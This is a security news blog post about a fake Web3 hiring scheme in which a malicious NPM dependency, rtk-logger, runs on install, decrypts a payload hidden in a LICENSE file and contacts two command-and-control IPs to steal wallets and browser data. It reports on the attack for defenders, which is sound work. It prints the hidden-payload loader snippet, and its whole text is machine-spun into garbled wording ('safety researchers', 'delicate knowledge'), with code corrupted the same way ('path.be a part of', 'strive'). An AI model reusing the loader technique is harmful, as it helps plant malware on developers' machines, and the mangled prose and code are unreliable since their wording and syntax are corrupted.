Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Ukrainian Web3team Weaponizing NPM Package to Attack Job Seekers and Steal Sensitive Data

Posted on August 13, 2025August 13, 2025 By CWS

A complicated cybercriminal operation disguised as a Ukrainian Web3 growth group has been focusing on job seekers by means of weaponized NPM packages, safety researchers warn.

The assault leverages faux interview processes to trick unsuspecting candidates into downloading and executing malicious code that steals cryptocurrency wallets, browser knowledge, and delicate private info.

The marketing campaign facilities round a seemingly reputable GitHub repository known as “EvaCodes-Neighborhood/UltraX,” which attackers current to potential workers throughout first-round interviews.

Victims are instructed to clone and run the repository domestically as a part of a technical evaluation. Nonetheless, the venture accommodates a malicious NPM dependency designed to reap delicate knowledge from the goal’s system.

On August 9, 2025, a group member approached SlowMist researchers after turning into suspicious of the repository’s contents throughout an interview course of.

The safety group’s subsequent evaluation revealed the presence of a backdoor embedded throughout the venture’s dependencies, confirming the malicious nature of what seemed to be a typical Web3 growth repository.

SlowMist analysts recognized that the assault initially used the NPM bundle “[email protected],” which was later changed with “[email protected]” after the unique bundle was eliminated by NPM’s safety group.

The newer bundle, revealed on August 8, 2025, accommodates closely obfuscated code designed to evade detection whereas sustaining the identical malicious performance.

The menace extends past particular person victims, because the researchers found that two further GitHub accounts had forked the malicious repository, suggesting a broader marketing campaign focusing on a number of potential victims throughout the Web3 job market.

An infection Mechanism and Code Execution

The malware’s an infection vector depends on social engineering fairly than technical exploitation, making it significantly harmful for job seekers within the aggressive Web3 house.

As soon as the sufferer clones the repository and executes “npm set up,” the malicious rtk-logger bundle mechanically triggers its payload by means of a classy multi-stage course of.

malicious code location (Supply – Medium)

The bundle’s core malicious code resides in “/rtk-logger/lib/utils/smtp-connection/index.js,” which makes use of AES-256-CBC decryption to unlock obfuscated payloads saved within the LICENSE file.

The decryption course of employs hardcoded keys and initialization vectors, permitting the malware to execute with out further community communication throughout preliminary deployment.

const fs = require(‘fs’);
const path = require(‘path’);
const parseLib = require(‘./parse’)
const filePath = path.be a part of(__dirname, ‘LICENSE’);
fs.readFile(filePath, ‘utf8’, (_, knowledge) => {
strive {
eval(parseLib(knowledge))
} catch (err) {
console.error(‘Error throughout parsing/eval:’, err);
}
})

After profitable decryption, the malware establishes connections to command-and-control servers at 144.172.112.106 and 172.86.64.67, enabling distant entry and knowledge exfiltration capabilities whereas sustaining persistence by means of varied system-level modifications.

Enhance your SOC and assist your group defend your enterprise with free top-notch menace intelligence: Request TI Lookup Premium Trial.

Cyber Security News Tags:Attack, Data, Job, NPM, Package, Seekers, Sensitive, Steal, Ukrainian, Weaponizing, Web3team

Post navigation

Previous Post: Microsoft August 2025 Patch Tuesday Fixes Kerberos Zero-Day Among 111 Total New Flaws
Next Post: Fortinet, Ivanti Release August 2025 Security Patches

Related Posts

Microsoft Zero Day Quest Hacking Contest Cyber Security News
PoC Released for Linux Privilege Escalation Vulnerability via udisksd and libblockdev Cyber Security News
Retired US Air Force Employee Pleads Guilty for Sharing Military Secrets on a Dating App Cyber Security News
FBI Warns of US Govt Officials Impersonated in Malicious Message Campaign Cyber Security News
Windows Authentication Coercion Attacks Pose Significant Threats to Enterprise Networks Cyber Security News
Threat Actors Poisoning Google Search Results to Display The Scammer’s Phone Number Instead of Real Number Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Manpower Says Data Breach Stemming From Ransomware Attack Impacts 140,000
  • Windows Remote Desktop Services Vulnerability Let Attacker Deny Services Over Network
  • What the Next Wave of AI Cyberattacks Will Look Like — And How to Survive
  • Fortinet, Ivanti Release August 2025 Security Patches
  • Ukrainian Web3team Weaponizing NPM Package to Attack Job Seekers and Steal Sensitive Data

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Manpower Says Data Breach Stemming From Ransomware Attack Impacts 140,000
  • Windows Remote Desktop Services Vulnerability Let Attacker Deny Services Over Network
  • What the Next Wave of AI Cyberattacks Will Look Like — And How to Survive
  • Fortinet, Ivanti Release August 2025 Security Patches
  • Ukrainian Web3team Weaponizing NPM Package to Attack Job Seekers and Steal Sensitive Data

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News